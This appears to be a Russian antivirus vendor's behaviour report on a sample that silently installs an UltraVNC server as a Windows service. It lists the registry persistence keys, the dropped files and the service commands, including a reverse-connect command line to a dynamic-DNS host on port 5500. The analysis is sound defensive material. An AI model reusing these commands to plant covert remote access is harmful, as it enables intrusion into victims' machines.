Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\uvnc_service_autoit] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\uvnc_service_autoit] 'ImagePath' = '"%TEMP%\EZVNC\winvnc.exe" -service'
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\aut831c.tmp
- %TEMP%\ezvnc\winvnc.exe
- %TEMP%\aut83c9.tmp
- %TEMP%\ezvnc\ultravnc.ini
- %TEMP%\aut83e9.tmp
- %TEMP%\ezvnc\vnchooks.dll
- %TEMP%\aut83fa.tmp
- %TEMP%\ezvnc\pcgeek.bmp
- %TEMP%\aut840b.tmp
- %TEMP%\ezvnc\securevncplugin.dsm
- %TEMP%\aut844a.tmp
- %TEMP%\ezvnc\server_securevnc.pkey
Удаляет следующие файлы
- %TEMP%\aut831c.tmp
- %TEMP%\aut83c9.tmp
- %TEMP%\aut83e9.tmp
- %TEMP%\aut83fa.tmp
- %TEMP%\aut840b.tmp
- %TEMP%\aut844a.tmp
Сетевая активность
Подключается к
- 'ba#####ox.homeip.net':5500
UDP
- DNS ASK ba#####ox.homeip.net
Другое
Ищет следующие окна
- ClassName: 'WinVNC Tray Icon' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\ezvnc\winvnc.exe' -install uvnc_service_autoit
- '%TEMP%\ezvnc\winvnc.exe' -service
- '%TEMP%\ezvnc\winvnc.exe' -service_run
- '%TEMP%\ezvnc\winvnc.exe' -autoreconnect -connect battlebox.homeip.net
- '%WINDIR%\syswow64\net.exe' start "uvnc_service_autoit"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\net.exe' start "uvnc_service_autoit"
- '%WINDIR%\syswow64\net1.exe' start "uvnc_service_autoit"
- '%WINDIR%\syswow64\sc.exe' delete uvnc_service_autoit
